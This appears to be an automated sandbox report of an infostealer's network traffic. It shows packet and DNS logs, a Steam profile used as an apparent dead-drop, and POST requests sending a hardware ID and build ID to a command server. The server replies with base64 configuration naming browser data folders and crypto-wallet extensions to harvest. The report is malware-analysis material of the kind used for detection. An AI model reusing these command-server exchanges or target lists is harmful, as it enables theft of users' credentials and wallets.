                                                                                                      Sep 26, 2024 19:06:03.298707962 CEST443497385.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.104365110 CEST443497385.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.104532003 CEST443497385.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.104650974 CEST49738443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:06:04.104693890 CEST49738443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:06:04.105036020 CEST49738443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:06:04.105053902 CEST443497385.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.356025934 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:04.356072903 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.356152058 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:04.356605053 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:04.356621027 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:05.306778908 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:05.307012081 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:05.311429977 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:05.311444044 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:05.311717033 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:05.311779976 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:05.312243938 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:05.359409094 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.929615021 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.929681063 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.929842949 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.929842949 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.929862022 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.929902077 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.962704897 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.962810040 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.971453905 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.971584082 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.984818935 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.985042095 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.988945961 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.989027023 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:06.997894049 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:06.997965097 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.003376961 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.003457069 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.006979942 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.007054090 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.012331963 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.012402058 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.022201061 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.022305965 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.025491953 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.025652885 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.027277946 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.027349949 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.031646967 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.031723022 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.042013884 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.042095900 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.046639919 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.046709061 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.050328970 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.050395012 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.056143045 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.056214094 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.065850973 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.065922022 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.074583054 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.074754953 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.082138062 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.082209110 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.085568905 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.085644007 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.090095997 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.090164900 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.093594074 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.093666077 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.107897997 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.108066082 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.117134094 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.117211103 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.125648975 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.125724077 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.126019001 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.126085997 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.129482985 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.129549980 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.132841110 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.132921934 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.136241913 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.136317015 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.140166998 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.140232086 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.142824888 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.142898083 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.144644976 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.144716978 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.146588087 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.146653891 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.146745920 CEST44349739172.105.54.160192.168.2.5
                                                                                                      Sep 26, 2024 19:06:07.146792889 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.158458948 CEST49739443192.168.2.5172.105.54.160
                                                                                                      Sep 26, 2024 19:06:07.158474922 CEST44349739172.105.54.160192.168.2.5

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 26, 2024 19:05:25.633887053 CEST5476953192.168.2.51.1.1.1
                                                                                                      Sep 26, 2024 19:05:25.641083956 CEST53547691.1.1.1192.168.2.5
                                                                                                      Sep 26, 2024 19:06:04.108952999 CEST5585953192.168.2.51.1.1.1
                                                                                                      Sep 26, 2024 19:06:04.354983091 CEST53558591.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Sep 26, 2024 19:05:25.633887053 CEST192.168.2.51.1.1.10xf01bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                      Sep 26, 2024 19:06:04.108952999 CEST192.168.2.51.1.1.10xccfaStandard query (0)dbsmena.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Sep 26, 2024 19:05:25.641083956 CEST1.1.1.1192.168.2.50xf01bNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                      Sep 26, 2024 19:06:04.354983091 CEST1.1.1.1192.168.2.50xccfaNo error (0)dbsmena.com172.105.54.160A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • steamcommunity.com
                                                                                                      • 5.75.211.162
                                                                                                      • dbsmena.com

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549715104.102.49.2544436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:26 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                      Host: steamcommunity.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:27 UTC1870INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                      Cache-Control: no-cache
                                                                                                      Date: Thu, 26 Sep 2024 17:05:26 GMT
                                                                                                      Content-Length: 34725
                                                                                                      Connection: close
                                                                                                      Set-Cookie: sessionid=d9c2acdbbbc3eb5d00e7d967; Path=/; Secure; SameSite=None
                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                      2024-09-26 17:05:27 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                      2024-09-26 17:05:27 UTC16384INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                                      Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                                      2024-09-26 17:05:27 UTC3768INData Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f
                                                                                                      Data Ascii: vate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
                                                                                                      2024-09-26 17:05:27 UTC59INData Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: </div>... responsive_page_frame --></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.5497165.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:29 UTC185OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:29 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:29 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.5497175.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:30 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 255
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:30 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 38 41 43 30 44 36 31 35 45 31 36 35 30 34 34 35 35 32 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 2d 2d 0d 0a
                                                                                                      Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="hwid"708AC0D615E1650445529-a33c7340-61ca------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AEGHIJEHJDHIDHIDAEHC--
                                                                                                      2024-09-26 17:05:31 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:30 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:31 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 3a1|1|1|1|8501f5d5616d1cfe27783966f7e54258|1|1|1|0|0|50000|10


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.5497185.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:31 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 331
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AAAAKJKJEBGHJKFHIDGCCont
                                                                                                      2024-09-26 17:05:32 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:32 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:32 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.5497195.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:33 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 331
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJDHIDBFBFHIJKFHCGIECont
                                                                                                      2024-09-26 17:05:33 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:33 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:33 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
